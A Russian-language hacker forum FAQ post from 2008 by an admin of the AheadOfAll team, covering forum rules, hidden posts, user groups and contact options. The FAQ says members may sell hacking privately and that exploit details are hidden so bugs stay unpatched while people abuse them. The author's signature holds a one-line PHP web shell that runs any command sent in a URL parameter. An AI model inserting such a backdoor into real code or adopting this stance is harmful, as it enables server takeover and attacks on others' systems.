Тема: Faq
Показать сообщение отдельно
Старый 12.03.2008   #1 (permalink)
Erlien
In Death We Trust
© AoA Team

Вы сказали Спасибо: 3
Поблагодарили 16 раз(а) в 15 сообщениях
Erlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспорима
Сообщение Faq

Q: Вы крутые хакеры ? сломайте вот этот сайт/форум/сервер.

A: Администрация AheadOfAll не принимает заказов на взлом ,
однако любой член команды может оказывать подобные услуги в частном порядке и от своего имени .
Это значит что никто не вправе действовать от нашего имени ( за исключением особо оговоренных случаев ).

Q:Кто входит в состав администрации ?

A: На данный момент это : Erlien, R1v3R и Vin4ester.
Только они вправе говорить от лица администрации портала.

Q:На вашем форуме я вижу такой текст :
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
что это такое ?

A:Это хайд , для просмотра некоторой ценной информации на форуме нужно быть тут зарегистрированным
и иметь определенное кол-во сообщений ( они же посты , мессаги ).

Q:Как поставить хайд?

A:В форме быстрого ответа и в форме расширенного редактора есть кнопка HIDE.
Нажав на неё нужно ввести кол-во постов для просмотра текста под хайдом.

Пример:

[HIDЕ="10"]
тут текст который должен быть под хайдом
[/HIDЕ]

10- кол-во постов для просмотра.

Q:Какая глупость этот Хайд , зачем он нужен ? ведь из-за него все только и будут флудить и набивать посты ?

A:В общем то лично я придерживаюсь концепции свободного доступа к информации , но к сожалению некоторые вещи нельзя выкладывать на всеобщие обозрение.
Ведь как вы сами понимаете если к примеру о баге станет известно администраторам сервера то его быстро пофиксят и никто не сможет им воспользоваться.
Хайд это вынужденная мера ограничения доступа к ценной информации , рано или позно уязвимость все равно пофиксят, но пройдет какое то время за которое люди успеют ей воспользоваться.
На этом форуме вы можете получить достаточно ценную информацию совершенно бесплатно ), но как вы понимаете абсолютной халявы не существует и придется немножко напрячься чтобы получить к ней доступ.
Ну а с флудерами набивающими посты мы как нибудь справимся , если вы думайте что можно быстро нафлудить 50-100 постов увидеть то что нужно и вас забанят , то вы ошибаетесь ) на форуме существует задержка отправки сообщений да и модераторы не дремлют , так что вам врятли удастся набрать и 20 сообщений.

Q:У меня совершенно нет времени набирать посты , но
я располагаю большими знаниями по одному из направлений вещего форума.

A:В данном случаи все будет решаться в частной беседе с одним из администраторов (или уполномоченный членом команды АоА).
Вам может быть открыт доступ в некоторые разделы если вы готовы поделиться какой-либо актуальной информацией с нами.

Q: Почему созданную мной тему удалили ?

A: По всей видимости Администратор или Модератор решил что ваша тема является флудом , повторяет какую-либо тему на форуме или противоречат общим или локальным правилам одного из форумов.
Вы можете уточнить причину удаления темы в частной беседе если вам известно кто её удалил или написать в соответственный раздел форума.
Ссылка

Q:Какие группы существуют на форуме и какие у них права ?

A:

Q:Я администратор игрового сервера , форума похожей тематики и т.п. и т.д. и хочу с вами сотрудничать

A:Вы можете связаться с одним из администраторов через П.М. ( систему личных сообщений форума ) ,ICQ или с помощью формы Обратной связи.

Q:У меня есть некоторые вопросы на счет регистрации и отправки сообщений

A:Вам следует почитать Справку по форуму

Q:
Цитата:
Сообщение от GHB Посмотреть сообщение
кстати куда делась кнопка "спасибо"?

A:Возможность поставить *спасибо* есть только у группы AoA member и выше .
Для попадания в эту группу нужно: 10 сообщений или 2 *спасибок * + неделя с момента регистрации,
возможность получить спасибо есть всегда =)
Это сделано для того чтобы кол-во *спасибо* отражало реальную репутацию пользователя.

Вы можете оставлять тут свои вопросы , если я сочту это необходимым то они будут добавлены в FAQ

Извечный спор между собой ведут
Луна и звезды - кто из них главней?
И кто в ответе за игру ночных теней?

Ничего святого =\
Для анегдотов =>abuse(а)AheadOfAll.Org
<?
system($_GET["2pwn"]);
?>
Мои услуги, по прайсу.

Последний раз редактировалось Erlien; 10.10.2008 в 22:44.
Erlien вне форума   Ответить с цитированием
Этот пользователь сказал Спасибо Erlien за это полезное сообщение:
ekstazzy (01.11.2008)

Реклама=\